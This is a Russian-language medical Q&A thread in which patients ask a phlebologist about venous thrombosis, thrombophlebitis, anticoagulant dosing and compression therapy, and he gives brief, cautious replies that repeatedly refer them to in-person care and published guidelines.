Никакой «курсовой» защиты от тромбоза не бывает, пить антикоагулянты «курсами» — бессмысленно и опасно. В Вашей ситуации профилактика — это повышенная защита в случае высокого риска повтора тромбоза (беременность, плановое хирургическое лечение, любое попадание в больницу и т.п.). Проще говоря, если какое-то серьезное событие в жизни — нужно рассматривать вопрос, не нужна ли защита от тромбоза антикоагулянтами.

Ответить

Уважаемый Евгений Аркадьевич! Разрешите поздравить вас с профессиональным праздником! Желаю вам крепкого здоровья на долгие годы, счастья в личной жизни, успехов и карьерного роста, благополучия . Огромное спасибо за ваши консультации и советы .вы очень доступно нам все пр ищете! Ваш труд благороден.земной вам поклон!

Спасибо за поздравление и теплые слова! Берегите себя.

Ответить

Здравствуйте, у меня изначально возник тромбоз глубоких вен берцового сегмента правой нижней конечности, затем осложнилось ТЭЛА и на фоне антикоагулянтной терапии сформировался флотирующий тромбоз подвздошного сегмента слева. При выписки назначили ксарелто в стандартной схеме, компрессионные чулки 2 класса, детралекс. Замечаю, что после снятия чулков левая нога становится синей, по сравнению с правой, хотя изначально тромбоз сформировался в ней, хотелось бы понять, почему так происходит, с чем это связано и пройдёт ли это состояние? Назначили строгий постельный режим, адекватен ли он в данном случае или все таки можно ходить, увеличивая нагрузку с каждым днем? Спасибо большое заранее за ответ.

Выписка из стационара подразумевает, что ограничений по подвижности нет. При амбулаторном лечении тромбозом рекомендуется двигаться, ходить, это важный элемент профилактики повторов тромбоза и улучшения результатов лечения. Остальное можно комментировать только очно.

Ответить

Здравствуйте! После ковида (болела дома, поражение лёгких 9 проц.) через 3 недели был повышен Д-димер 1000.37 (0-285), прошла УЗИ сосудов нижних конечностей, тромбов не обнаружено, заключение «признаки облитерирующего атеросклероза без дистального дефицита кровоснабжения в покое». 2 месяца принимала детравенол 1000 мг 1р/день, больше никакого лечения не назначалось. Через 6 месяцев в анализах крови Д-димер стал 1195.15 (0-285), другие анализы в норме. говорит ли повышенный Д-димер о наличии тромбов где-то ещё? Назначили Кардиомагнил 75 мг 1 р/день и эликвис 2,5 мг 1 р/день. Это на 3 месяца, потом пересдать анализ. Нужно ли чего-то опасаться? И стоит ли сделать допплер сосудов шеи и головы? Спасибо.

говорит ли повышенный Д-димер о наличии тромбов где-то ещё? 

Не говорит. И это не показание к назначению дезагрегантов и антикоагулянтов. И следить за Д-димерами не нужно. Кстати, сочетание дезагрегантов и антикоагулянтов (кардиомагнил + эликвиз) сильно повышает риск кровотечений, например, геморрагического инсульта, желудочных, почечных. Для таких назначений нужны серьезные основания.

Ответить

Здравствуйте, моей маме поставили стенд в сердце 7 июня. С дня операции болит операционная рука . Когда делаем инекцию кетанол, боль прекращается, но он имеет противоказание, чешется кожа .Также 4 года назад ей сделали пересадку почек. Сейчас ей очень больно что нам нужно сделать и с чем это может быть связано Заранее благодарю за ответ

Артериальные проблемы — вне моей компетенции. Свяжитесь с оперировавшим хирургом. 

Ответить

Здраствуйте, после травмы голеностопа, в начале апреля провели остеосинтез с металлофиксаторами. Беспокоило то, что при опускании ноги вниз ступня за минуту «наливалась кровью», становилась синюшной. После снятия гипса, в начале июня диагностировали произошедший ТГВ пббв. Сейчас по узи указали посттромботический флебит пббв, врач хирург говорит о подостром тромбозе и птфс, и назначил лечение элеквис по 10м г 2 раза/сут .на 7 дней и по 5 мг 2 раза/сут на 3 мес, плюс компресс.чулок 2 кл., что я и принимаю и ношу.Нога у меня отекшая только в месте перелома -ложыжках, над щиколоткой больше на 1 см, мышцы голени частично атрофированы и ее объем меньше чем на здоровой ноге. У меня сейчас проходит лфк -разрабатываю голеностоп в чулке, по вечерам ступня побаливает от нагрузки. 1. Можно ли мне сейчас разрабатывать голеностоп? 2. Через месяц будут удалять под местн.анестезией спицы и винт, насколько это опасно для повторного тромбоза и ухудшения уже существующего состояния? 3. Спустя время, после реканализации тромбов ступня перестанет синеть или это навсегда?

Я сомневаюсь, что тромбоз ПББВ может сказаться на состоянии ноги, это слишком мелкие, «второстепенные» вены. Нужна ли сейчас, по прошествии двух месяцев, антикоагуляция — большой вопрос. В целом ситуация по описанию не выглядит очень тревожной. На мой взгляд, насколько можно судить заочно, ЛФК делать можно и нужно. Но большего сказать заочно невозможно, если нужно «второе мнение» — обратитесь к специалистам очно.

Здравствуйте, спасибо за ответ, посоветуйте еще пожалуста, как лучше распределить время нахождения ноги в горизонтальном и вертикальном положении, в котором ступня синеет, как долго можно держать ее, опустив вниз?

Я не могу оценить что происходит заочно. В целом, ощущения в ноге — это основной индикатор, хорошо ей, или плохо.

Здравствуйте, у нас маленький город, сосудистого хирурга или флеболога нет. Если знаете,, посоветуйте флеболога в магнитогорске.

Кугеев Артур Фоатович, Ковальчук Андрей Дмитриевич

Ответить

Здравствуйте! У меня тромбоз глубоких вен, 3года назад было тэло. Сейчас чувствую себя нормально, но болят колени. Пью ксарелто 20 мг пожизненно . Можно ли лечить колени прогревающие компрессы эзокеритом

На фоне приема ксарелто, думаю, это безопасно.

Ответить

Добрый день! Был тромбофлебит поверхностных вен. Тромб считай растворился, остались небольшие остатки. Тромбофлебит образовался в варикозных венах ноги голени. Врач говорит, что необходимо делать лазерную операцию по удалению вены, потому что в ближайшее время может вновь образоваться тромб. Сейчас хожу в компрессионное гольфе .Скажите ,пожалуйста, можно ли сейчас не делать операцию, а сделать её осенью или зимой? Можно ли когда полностью рассосется тромб ходить без компессионных гольфов? И если делать операцию, то лучше лазером или минифлебэктомию? Спасибо за ответ

Здравствуйте.

Никому не известно, случится у Вас повтор тромбофлебита до осени, или не случится. Если тромбофлебит уже произошел, то риск повтора вырастает очень сильно, поэтому в целом лучше не откладывать, и сделать операцию настолько быстрее, насколько это возможно.

Компрессионный трикотаж не защищает от повтора тромбоза. Большого смысла носить трикотаж если нет постоянного, хронического отека ноги — нет. Если нет отека я трикотаж вообще в таких ситуациях не назначаю.

Лазер и минифлебэктомия это методы, которыми устраняют разные вены. Лазер — запаять «источник» варикоза, минифлебэктомия — убрать видимые варикозные вены. Поэтому обычно они используются вместе.

Спасибо за ответ! Скажите, как долго реабилитация после удаления вены? Имеется ввиду как быстро можно выходить на работу ( сидячая).

По разному. Кто-то на следующий день уже не помнит, что его оперировали, кому то нужно несколько дней, чтобы полноценно восстановить активность. Но уж сидеть то точно не возбраняется. Конкретно примерный прогноз сделает только тот, кто будет делать операцию.

 

Ответить

Здравствуйте! Хотелось бы ваше мнение. Сейчас беременна 35 недель, примерно месяц назад образовалось уплотнение на ноге, больно если на него надавить посильнее, пошла на узи мягких тканей, сказали, что это варикозный узел, я спросила не тромбоз ли это, ответили, что нет. После чего примерно через полторы недели пошла на дуплексное сканирование вен нижних конечностей к сосудистому хирургу, диагноз стихающий локальный тромбофлебит единичной ретикулярной вены на уровне левого бедра, варикозная болезнь нижних конечностей, ретикулярный тип. Все вены проходимы, клапаны все функционируют. Назначили клексан 2 раза в сутки по 0,4, ставлю. Все же возникает ряд вопросов. 1) Могло ли первое узи не увидеть тромба, либо второе быть неверным, есть ли смысл ещё сделать узи у третьего специалиста? 2) Не совсем понятно, описание диагноза тромбофлебит и описание других людей, о том что по ходу вены есть какие-то отеки, покраснения, у меня же вообще нет никакой вены, отёка, покраснения, есть вот это плотное образование в виде шарика, это и есть тромбофлебит? Либо же его можно визуально не видеть и при этом он есть? 3) Каким образом получилось так, что я не получала никакого лечения, а тромбоз сам начал рассасываться и я даже не заметила его так скажем «пика», если бы не было этого шарика я бы не обратила внимания даже, но я так понимаю он не имеет особо отношения к тромбу, так как тромб так не выглядит, это варикозное расширение как я поняла, но выглядит довольно странно, неужели это такое незаметное заболевание и его так легко пропустить? Как же мне теперь контролировать этот процесс, ведь этого узла может не быть, а тромб образоваться, как я понимаю, по каким признакам это должно быть ясно? 4) достаточно ли будет лечения в течении трёх месяцев клексаном или лучше дальше продолжить профилактику таблетками? 5) Когда можно сделать операцию по удалению этого узла? Нужно ли ждать когда тромб рассосётся полностью? 6) не изменятся ли клапаны и проходимость вен после этого случая?

Разьяснения по Вашим вопросам требуют значительного времени. Это не для формата сайта «вопрос-ответ», все это нужно обсуждать с врачом очно, при необходимости — переспрашивать, уточнять.

Если коротко:

— естественно, тромбофлебит может быть разной выраженности, от «бессимптомного», до бурного воспаления;

— естественно, на УЗИ могут видеть тромбо когда его нет, и не видеть тромб когда он есть. УЗИ, как и любое исследование, дает определенный процент ошибок.

Если факт тромбофлебита установлен, то до конца беременности и некоторое время после родов Вы должны получать антикоагулянты. Тактика лечения при тромбофлебите во время беременности очень детально рассмотрена в рекомендациях Ассоциации флебологов России 2021 г. «Флебит и тромбофлебит поверхностных сосудов», там есть отдельный раздел по беременности, на который и должны опираться врачи.

Нужно ли оперироваться потом, каким способом, когда и т.п. — это точно вопросы не для заочного обсуждения «в общих чертах», тут огромное значение имеет то, что мы видим при осмотре и детали УЗИ, которые не прописывают в общих протоколах, но которые флеболог учитывает при самостоятельном проведении ультразвукового исследования.

Ответить

Извини меня конечно за то что я вас часто тревожу.Скажите пожалуйста,этот тромб может оторваться вообще? Может мне попить лекарство чтобы он быстрее рассосался? Что подскажите ? Ещё рас простите извините !!!

Если бы было что-то полезное в такой ситуации — я бы написал. Ваше лекарство — время.

Ответить

Ещё раз здравствуйте.напишу конкретней вам с исследованием вообще В медиальной подкожной Вене в области локтевой ямки на участке до 5 см лоцируется вена шириной до 6.2 мм с пристеночными гиперэхогенными тромбичискими массами .компрессия (-).кровоток не лоцируется.стенки утолщены,уплотнины.флотирующие тромбы не лоцируются .с артериями все хорошо и с глубокими венами тоже . заключение-признаки тромбоза медиальной подкожной вены правой верхней конечности. Это все случилось после капельницы три дня ставили капельницу и потом началось ..подскажите более конкретно что мне делать…спасибо вам большое

Я не лечу заочно. Катетерные тромбозы (после уколов, капельниц) — вполне обычное дело, вены не любят, когда в них иголки вставляют. Они не почти никогда не опасны, лечение обычно проводится только симптоматическое, болит — обезболивающее, есть воспаление — противовоспалительное. Нестандартные действия нужны при нестандартном развитии событий — тромбы ползут вверх, или бурное воспаление, или фон — раковое заболевание и т.п.

Спасибо вам большое! Моло конечно в этом мире,таких людей как вы побольше бы таких) оно меня сейчас не болит,восполнения нету,просто когда пальцем трогаешь вену там твордое((( значит ничего с ним делать не надо ? Само пройдет я правильно понимаю? Я просто чего переживаю я спроцмен КМС и щас уже неделю не хожу на тренировки не знаю можно мне или нет нагружаться ч

Уплотнение может быть много месяцев. Не обращайте внимание. Никаких ограничений по нагрузкам, спорту в таких ситуациях нет.

Спасибо за добрые слова.

Та просто много кто говорит что это очень опасно,что этот тромб может оторваться вот я и переживаю((

Здравствуйте у меня послеиньекционный тромбофлебит сегодня сделал УЗИ вен сказали что тромбоз это очень опасно ?

Обычно не очень.

Ответить

Здравствуйте. 5 апреля отекла левая нога. Диагноз по узи тромбоз 7 вен. 3 недели госпитализации. Терапия варфарин -3 шт 1 р в день, гипер-интересен в живот 7 дней. Антибиотики. Детралекс 1000 -3 р в день. Мнр поднялось до 2,3. Компрессионный чулок. Но отёк так и не спадает. По последнему УЗИ слабая ре канализация. Сейчас терапия варфарин 3 табл _1рвз в день Детралекс 1 р в день 1000 Всё. Беспокоит, что отёк сильный ьедро разница в 5 см Икра-3 см. Отёк спустился на стопу. Подскажите, чем помочь, что бы отек был меньше. Давяще- роспираюшая боль. Тяжесть в ноге. Много ходить боюсь. Чулок ношу. В её ли правильно мне назначает врач

АНтикоагулянты (таблетки) к отеку не имеют никакого отношения. При значительном отеке компрессионную терапию нужно начинать не с чулка, а с бандажирования конечности, и переходить на чулок когда отек будет максимально уменьшен «вручную».  

Ответить

Добрый день, Уважаемый Евгений Аркадьевич! В феврале перенесла операцию (экстирпация матки, тазовая лимфаденэктомия). Сейчас прохожу лучевую терапию. Стала отекать правая нога (колено и выше). Сделали триплексное сканирование вен нижних конечностей. Заключение: Тромбоз глубоких вен правой н/к. Стадия реканализации в ОБВ. Тромбоз ОБВ. Признаки флебита БПкВ справа с высоким риском тромбоза. По крови Д-димер повышен в 2 раза. Врач радиолог, у которого прохожу лечение, назначил Элликвис 5 мг/день и Детралекс по 1000 2 раза в день. Вопрос: правильно ли назначено лечение? Достаточно ли этого? Или нужны какие-то дополнительные обследования и консультация профильного специалиста (флеболога)?

Если речь идет об остром тромбозе поверхностной вены (БПВ), то по утвержденным рекомендациям из пероральных антикоагулянтов можно применять ривароксабан (Ксарелто) в дозе 10 мг в сутки. Однако, учитывая уже перенесенный тромбоз глубоких вен и незавершенное лечение по онкозаболеванию я бы, наверное, в такой ситуации предпочел полные лечебные дозы антикоагулянтов, а в качестве препаратов выбора — низкомолекулярные гепарины. В определении такики нужно учитывать произошел тромбоз БПВ на фоне приема антикоагулянтов или без них. Детралекс к лечению тромбозов отношения не имеет, на отек в данной ситуации вряд ли повлияет. 

Ответить

Добрый день! Через какое время после операции по удалению катаракты можно возобновить прием ЭЛИКВИСа?

Насколько я знаю, операции по поводу катаракты не требуют отмены антикоагулянтов. Решает это оперирующий врач — офтальмолог.

Ответить

Добрый день, Уважаемый Евгений Аркадьевич! После кесарева 5 лет назад был тромбоз глубоких вен левой нижней конечности (илеоф). Курс на год антикоагулянтов прошла, отёк 2,5 см. сохранялся и назначили через 2 года капельницы Вессел Дуэф 10 дней и таблетки на месяц. Отёк спал, стал 2 см. в икре , в щиколодке 0,5 см. Прошло ещё 2 года, ничего не принимала, отёк тот же. Носила гольф на одну ногу, на улицу вообще без всего ходила. Стала очень беспокоить тянущая боль, по внутренней поверхности бедра и по ночам под коленкой. Без гольфа уже ходить больновато, одеваю-намного лучше. Д-димер 0,25 (врач сказал в порядке). УЗИ — жду запись. Но уже назначили Ксарелто на 2 недели 15 мг 1 раз в день. Вопрос: можно ли принимать Ксарелто по такой схеме и краткосрочно? Сойдёт ли отёк, если начну делать бинтование бинтами короткой растяжимости + принимать Ксарелто и сразу после этого носить гольф? Может перейти на чулок 2 компрессии лучше? Спасибо!

Такие вопросы не решаются заочно. Д-димеры 0,25 — ни о чем не говорит, нужно приводить референсные значения («норму») лаборатории. Если в пределах референса — то тромбоз исключен и зачем назначен антикоагулянт — совершенно непонятно. По компрессии — очно, зависит от состояния ноги.

Ответить

Добрый день! Уважаемый Евгений Аркадьевич! У меня вопрос по поводу совместимости препаратов. После перенесенного илеофеморального тромбоза левой нижней конечности в 2016 году принимаю постоянно эликвис. Сейчас обращалась к офтальмологу он назначил эмоксипин 1 мл в/м 1 раз в день 10 уколов. Скажите, пожалуйста, эти препараты совместимы? Спасибо.

Не знаю. В системах проверки взаимодействия препаратов Эмоксипин не значится. Задайте вопрос назначившему врачу.

Ответить

добрый день Евгений Аркадьевич! После введения кетамина произошел тромбоз латеральных вен на обоих руках. Принимаю аспирин-кардио 3 месяца, детралекс 1000 г 2 месяца, и мажу руку лиотоном 2 раза в день. Как быть в дальнейшем, можно ли в эти вены делать внутривенные иньекции? и сколько надо носить компрессионный трикотаж?

Постиньекционные тромбозы на руках не требую лечения. Принимать аспирин и детралекс, мазать лиотоном никакого смысла нет. В первые дни, если есть воспаление и боли — назначаются противовоспалительные. Если вены «раскроются» — инъекции в них допустимы. Про трикотаж не понял — компрессионные рукава? Зачем??? Если есть отек всей руки/рук — дело явно не в латеральных венах, и нужно разбираться очно.

Ответить

Евгений Аркадьевич, можете подсказать флеболога в Киеве?

Щукин Сергей Петрович, Врач флеболог Щукин Сергей • лечение варикозной сетки • сосудистый хирург • консультация • выбор метода лечения варикозного расширения вен | Phlebos

Ответить

Здравствуйте мне 35 лет 24 февраля случил неврит лицевого нерва правой стороны. Перекошено половина лица. Начала лечение сразу 1.5 месяца уколов капельниц, таблеток. Врач сказала сделать перерыв. Через две недели начали неметь кончики пальцев то рук то ног. Сделала МРТ заключение. 1 слабо выражены сигнал от задних соединительных артерий. 2. слабо выражен сигнал о правой вестебральной артерии. 3 гипоплазия правой вертебральной артерии Врач назначил Трентал 1 таб три раза в день в течении месяца. Сказал не чего страшного. Но меня не устраивает мне кажется не полное лечение при таком МРТ наверное нужно поддерживающая терапия каждые пол года или принимать препараты каждый месяц. Что делать при таком диагнозе МРТ. Спасибо заранее.

Ваш вопрос вне моей компетенции, я занимаюсь заболеваниями вен.

Ответить

Уважаемый Евгений Аркадьевич после эндопротезирования получился илеофеморального тромбоз 2года назад .п по инимала11 месяцев ксарелто по схеме. Через 3месяца после отмены вновь диагностировали тромбоз о бщей и наружной подвздошной вен . принимаю вновь ксарелто по20 мг . Не Ога без варикоза .разница со вы торой ногой к вечеру 1см. На УЗИ тромбы в подвздошной и наружной венах без признаков реканализации.мне советуют с 20мг перейти на10 мг . У меня вопрос : п при инимать ли мне пожизненно ксарелто и в какой дозировке.компрессионными чулками пользуюсь постоянно.

Если подтвержден повторный тромбоз, то рекомендуется бессрочный прием антикоагулянта. Раз в год встреча с врачом и оценка того, что правильнее — продолжать антикоагулянт, или прекратить. Для продленной антикоагуляции рекомендуются уменьшенные дозы ксарелто (10 мг в сутки). Однако в деталях все это должно обсуждаться и решаться очно.

Самая большая сложность в таких ситуациях — определить, а действительно ли был повтор тромбоза, и по УЗИ на уровне подвздошных вен это видно плохо. Главные ориентиры — уровень Д-димеров и состояние ноги (при значительном рецидиве нога отекает сильнее, чем обычно).

Ответить

Евгений Аркадьевич, как вы относитесь к спискам продуктов, которые «сгущают» и «разжижают» кровь? Например, продукты с высоким содержанием витамина К. Действительно есть какое-то влияние?

Никак. Сгущается кровь только от дефицита воды. Влияние на свертываемость продуктов с высоким содержанием витамина К есть только по отношению к тем, кто принимает варфарин, дургих антикоагулянтов это не касается. Да и с варфарином важно не ограничение поступления таких продуктов, а «равномерность» их приема при подобранном значении МНО.

А если прием антикоагулянтов уже закончен?

Нет продуктов, серьезно влияющих на свертываемость крови. На густоту влияет только вода. При этом «густота» и свертываемость — разные вещи.

Ответить

Здравствуйте, Евгений Аркадьевич. Подскажите, пожалуйста, как должна правильно проходить диагностика синдрома торакального выхода при тромбозе подключичной вены и диагнозе синдром Педжета-Шреттера?

Начинается все с УЗИ, потом доп методы визуализации — флебография/ КТ с контрастированием вен/ МРТ с контрастированием вен. Во многом это зависит от того, что доступно.

Ответить

Добрый день! Нужна ваша помощь. Мне 35. 10.04.22 к вечеру на левой ноге в районе икры появилась красная полоска в доль вены начала болеть. Думал ударился.Учитывая что в икре у меня вены расширенные и бывало побаливали, думал что все пройдет. С утра 11.04.21. болела сильно одел компрессионный чулок. Начал мазать троксевазинлвой мазью. 12.04.22 стало то место болеть меньше . В этот же день попал к сосудистому. Он сказал что нужно делать операцию, и у меня тромбофлебит. Учитывая какое сейчас время операция меня не устроила. Он выписал следующие лекарства: 1) На вену компрес мазь Вишневского, на ночь 5-7 дней марля четыре слоя, и пакет. Нога на подушку 15-20 см 2) Нормовен — ( или другой венотоник) 1 таб 2 р в день во время еды 2 -3 месяца 3) Ксарелто 15 по 1 табл 2 раза во время еды 21 день , затем ксарелто20 по 1 таблетки ещё 1 месяц 4) уколы мелоксикам, Мовалис 5 штук по 1.5 кубика. И сделать УЗИ. На вопрос нужно ли приходить с УЗИ сказал что нет, поскольку это будет подтверждением того что в ноге тромбофлебит. После первого вечера компресса мазью Вишневского начала болеть икра и справой стороны (до этого болела только с левой). 13.04.22 сделал УЗИ сказали что тромбофлебит (есть и справа в венах и с лева). Ниже прикладываю фото заключения. Делаю компрессы и пью указанные препараты уже неделю. Скажите нужно ли сдать какие то анализы? И нужно ли что делать дополнительно ( например мазать болевое место гепориновой мазью)? Нужно ли расхаживать ногу или же прилеживаться постельного режима? За ранее спасибо, за ответ!!!

Я ответил Вам 15 апреля, не дублируйте вопросы.

Ответить

Здравствуйте!Буду Вам очень признательна за ответ!Вопрос1.Мне 47 лет,можно ли принимать для профилактики препарат Флебодиа 600,есть на ногах «звездочки» и венки очень заметные.Вопрос 2 моей маме 73 года ,она принимает как три года кардиомагнил ,можно ли ей принимать препарат Флебодиа 600?Заранее Вас благодарю за ответ!

Никакие препараты, в том числе Флебодиа, не являются средством какой-то профилактики, не предотвращают появление «звездочек» и т. п. Что касается мамы — перед вопросом «можно ли» следует ответить на вопрос «нужно ли». Должна быть сформулирована цель, ради которой ей назначен препарат.

Ответить

Добрый день! Нужна ваша помощь. 10.04.22 к вечеру на левой ноге в районе икры появилась красная полоска в доль вены начала болеть. Думал ударился.Учитывая что в икре у меня вены расширенные и бывало побаливали, думал что все пройдет. С утра 11.04.21. болела сильно одел компрессионный чулок. Начал мазать троксевазинлвой мазью. 12.04.22 стало то место болеть меньше . В этот же день попал к сосудистому. Он сказал что нужно делать операцию, и у меня тромбофлебит. Учитывая какое сейчас время операция меня не устроила. Он выписал следующие лекарства: 1) На вену компрес мазь Вишневского, на ночь 5-7 дней марля четыре слоя, и пакет. Нога на подушку 15-20 см 2) Нормовен — ( или другой венотоник) 1 таб 2 р в день во время еды 2 -3 месяца 3) Ксарелто 15 по 1 табл 2 раза во время еды 21 день , затем ксарелто20 по 1 таблетки ещё 1 месяц 4) уколы мелоксикам, Мовалис 5 штук по 1. 5 кубика. И сделать УЗИ. На вопрос нужно ли приходить с УЗИ сказал что нет, поскольку это будет подтверждением того что в ноге тромбофлебит. После первого вечера компресса мазью Вишневского начала болеть икра и справой стороны (до этого болела только с левой). 13.04.22 сделал УЗИ сказали что тромбофлебит (есть и справа в венах и с лева в голени). Делаю компрессы и пью указанные препараты 4 -е дня. Скажите нужно ли сдать какие то анализы? И нужно ли что делать дополнительно ( например мазать болевое место гепориновой мазью)? Нужно ли расхаживать ногу или же прилеживаться постельного режима? За ранее спасибо, за ответ!!

Лечение никакой критике не поддается. Современная тактика лечения при тромбофлебите расписана в рекомендациях Ассоциации флебологов России от 2021 г, утвержденных Минздравом РФ: https://phlebounion.ru — Каталог

1. Режим всегда активный, лежать — плохо, подвижность предотвращает прогрессирование тромбоза.

2. Местные средства применять особого смысла нет.

3. Главное лекарство для остановки тромбоза — антикоагулянты, Ксарелто, но дозировка (если тромбоз только в поверхностных венах) — 10 мг в сутки.

4. Мазь Вишнвского никакой пользы не приносит и уже полвека при тромбофлебитах не рекомендована.

5. Сочетание Ксарелто с противовоспалительными средствами (Мовалис и ему подобные) не рекомендуется, повышает риск кровотечений. Назначать амбулаторно НПВС в уколах — это за гранью разумного. При болях лучше парацетамол, но если особо не болит — обойтись без.

Все остальное — очно, при остром тромбофлебите оперироваться нужно только если тромб ближе 3 см от перехода в глубокие вены, это определяется на УЗИ. Ситуация не очень понятная в плане тромбоза на двух ногах — ищите другое место компетентных специалистов на местах.

По тромбофлебиту нога только одна. Просто болело в голени сначала с лева , а затем начало с права (на икре ближе к коленному суставу). По УЗИ написали следующее . К сожалению сейчас нет других сосудистых. Артерии левой нижней конечности: визуализированные, проходящие Эхогенность комплекса I+М не изменена, дифференциация на слои не нарушена. Кровоток во всех сегментах магистральный, с обычными скоростями и спектрами. Вены левой нижней конечности: ОКВ, ОБВ, ПБВ, ГБВ,ПКВ, ОВГВ проходные, клапаны способны. Ствол БПВ варикозно не расширен, на остальном клапане в бедренном сегменте определяется рефлюкс, визуализируются варикозно расширенные притоки на голени. Ствол МПВ варикозно не расширен, на терминальном клапане рефлекс не определяется, визуализируются варикозно расширенные притоки МПВ по задней и передне-латеральной поверхности голени. В просвете варикозно расширенных притоков (коммуникативные притоки между БПМ и МПВ) по передней-латеральной и задней поверхности голени, ствол МПВ определяются тромботические массы, реканализация не определяется (окклюзия). Определяется перфорантная вена по латеральной поверхности в средней 1/3 голени. При компрессии датчиком глубокие вены спадаются полностью.

Чтобы получить ответ нужно задать вопрос.

Ответить

Добрый день, доктор. Переболела ковидом, за ним перелом ноги, долгая иммобилизация и как следствие тромбоз глубоких вен. Назначили ксарелто и детралекс. Сходила ещё на приём к другому врачу, он сказал отменить детралекс и принимать тромбовазим. Скажите, пожалуйста, какая схема более эффективна? С уважением, Светлана.

Основное лечение при тромбозах глубоких вен — антикоагулянты, минимальный срок — 3 месяца. Дальше принятие решения стоит ли продлевать, решается очно.

Антикоагулянты (Ксарелто) НИЧЕМ не заменяются.

Тромбовазим не входит в отечественные или зарубежные рекомендации по лечению ТГВ.

Детралекс не входит в отечественные или зарубежные рекомендации по лечению ТГВ.

Если отек ноги сильный — бандажирование до полного регресса отека, потом переход на компрессионный трикотаж. Если отек небольшой (разница окружностей ног до +1 см в самом узком месте голеней над лодыжками — на щиколотках) — можно сразу компрессионные гольфы.

Ответить

Добрый день доктор. Беременность 37 недель. Простыла заболело горло, потом присоединился насморк. Итог лор ставит гайморит с права, гной. Назначил Вильпрофен сулютаб 1000 мг. Но дело в том что я стою у гематолога на учёте в беременность и Колю клексан 0,4. В инструкции противопоказано принимать этот антибиотик с антикоагулянтами. Терапевт говорит ничего страшного. Лечить гайморит нужно, но боюсь последствий после приема антибиотика

Не встречал таких ограничений в инструкциях к названным препаратам. У Клексана нет взаимодействий с Вильпрафеном.

Ответить

Добрый день. Обследуясь у ревматолога по поволу болей в суставах (колени), был поставлен диагноз афс (меня было 5 замерших беременностей на одном сроке.) Нужно ли при афс принимать антикоагулянты для профилактики тромбообразования в моем случае. Мне 40 лет.

Здравствуйте, я не смогу Вам помочь, Ваши вопросы целиком в компетенции ревматолога.

Ответить

Здравствуйте! Мне поставили диагноз тромбофлебит левой Руки (под мышками) 2.5 см. принимаю ксарелта по 15мг. 2 назар в день до 3 недель, патом перехожу на 20 мг. На 3 месяца. Повтрное УЗИ показало через неделю 5 см. Скажите пожалуйста лечением ксарелто пройдет тромб? операционное вмешательств возможно? и КТА легких обязательно делать?

Если происходит рост тромба на фоне приема антикоагулянтов, то это совершенно ненормальная ситуация, с которой нужно быстро разбираться очно. Оперативно такие тромбы не лечатся, при подходящих сроках и возможности иногда проводится тромболизис. КТ легких с контрастированием сосудов нужно только при подозрении на ТЭЛА.

Ответить

Здравствуйте, у меня тромбоз глубоких вен. Я после беременности , прописали эликвис, но у меня идут обильные выделения, кровью. Можно ли их пить?

В такой ситуации нужно оценить, нужна ли дальнейшая антикоагуляция (при любом тромбозе минимально рекомендуемый срок — 3 мес, но нередко целесообразно продление до 6 — 12 мес) и определить «источник» кровтечения — от этого зависит, как с ним бороться в случае необходимости сохранить антикоагуляцию. В первую очередь — к гинекологу очно, а там в зависимости от результатов осмотра.

Ответить

Здравствуйте. У меня в марте обнаружили ТЭЛА в правом нижнем сенменте лёгкого 20 мм на 5 мм. 2 тромба по 4 см в поверхностной вене, и такой же в голени внутренние вены. Во всех случаях тромбы попали в перефирийные сосуды, магистральные вены не затронуты. Назначили Ксарелто и всё. Были ли у вас подобные случаи и рассосались ли тромбы? Заранее спасибо за ответ.

Если функция дыхания не нарушена (судя по всему — вряд ли), то кроме Ксарелто ничего не нужно. Обычно постепенно рассасываются.

Ответить

Здравствуйте) Я с Украины и вопрос посещение врача на данное время не актуален. У мамы 2 месяца назад обнаружити тромбоз поверхносной вены и назначили ксарелто По графику 30 мг три недели , а потом попала мама с ковидом и кололи клексан 800 два раза в день 10 дней, после больницы пила ксарелто 20 мг один раз в сутки— 2 недели и бросила… Теперь снова опухли все вены на ноге. Вопрос начинать прием ксарелто с нуля — по 30 мг три недели и переходить на 20 мг, или же возобновить прием по 20 мг— не принимает лекарство около недели ( перерыв).

Ксралето не влияет на состояние вен, он предотвращает тромбозы. В вашем описании оснований возобновлять прием ксарелто я не вижу. С венами разбираться, когда будет возможность очно обратиться к врачу.

Ответить

Здравствуйте! Диагноз тромбоз левой ноги. Можно ли совмещать ксарелто с кетотоп??

Антикоагулянты и НПВС (кетопрофен) сочетать не рекомендуется

Ответить

День добрый, у меня тромбофлебит подколенной вены (50лет). Внешние вены только появляются 1 шт (большая на голени). Прошло уже 4 месяца лечения Ксарелто и компрессионными чулками 2 степени, да стало лучше — но все равно икра отекает, чувство тяжести в ноге со временем появляется. К врачу сейчас возможности попасть нет (УЗИ в первую очередь). невропатолог предлагает лечение статинами и клопидогрелем, отсюда 3 вопроса: 1. Можно ли так заменить ксарелто (вопрос именно от невропатолога)? 2. Нужно/можно ли добавлять к этому детралекс, троксерутин итд? 3. можно ли отменить чулки — нет сил терпеть, пережимают мизинец

Ксарелто, статины, клпидогрель, детралекс, троксерутин и любые другие средства к устранению описанной проблемы «икра отекает, чувство тяжести в ноге со временем появляется» отношения не имеют. Нужно разбираться, насколько правильно проводится компрессионная терапия. Сделать это можно только очно. 

Обращаю внимание, что компрессионное изделие или бандаж не должны (!) вызывать боль и что-то «пережимать». И носить компрессию «через боль» категорически нельзя. 

Ксарелто — это противотромботический препарат. Препараты других групп (в том числе все перечисленные Вами) не могут заменить Ксарелто как средство защиты от повтора тромбоза. Минимальный срок приема Ксарелто -3 месяца. Нужно ли его продолжать дальше — зависит от многих факторов, решается это очно. 

Добавление к лечению Детралекса или Троксерутина для борьбы с отеком и тяжестью в ноге вряд ли изменит ситуацию. Нужно, как я говорил выше, разбираться с компрессионной терапией.

Спасибо за быстрый ответ. К сожалению, совершенно невозможно сейчас и в ближайшей перспективе попасть к врачу или на УЗИ и поэтому обращаюсь к вам с просьбой что можно сделать временно и совместимо с профилактикой инсульта, прописанной невропатологом (клопидогрель и статины). Диагноз тромбофлебит левой подколенной вены был поставлен по УЗИ при симптоматике сильный отек голеностопа, напряженность и болезненность мышц икроножной и камбаловидной, предтрофические состояния кожи выше голеностопа, тяжесть и распирания в левой ноге. Сейчас осталась только тяжесть в ноге при ходьбе, отека нет. На спине и пояснице появились ярко выраженные области с синими венами. Вот и диллема: 1. прекращать ксарелто и переходить на другие варианты (клопидогрель +статины что тоже нужно) + возможно детралекс 2. продолжать ксарелто, добавив статины и возможно детралекс/троксерутин на вас вся надежда, в интернете никто более подробно не расписывает

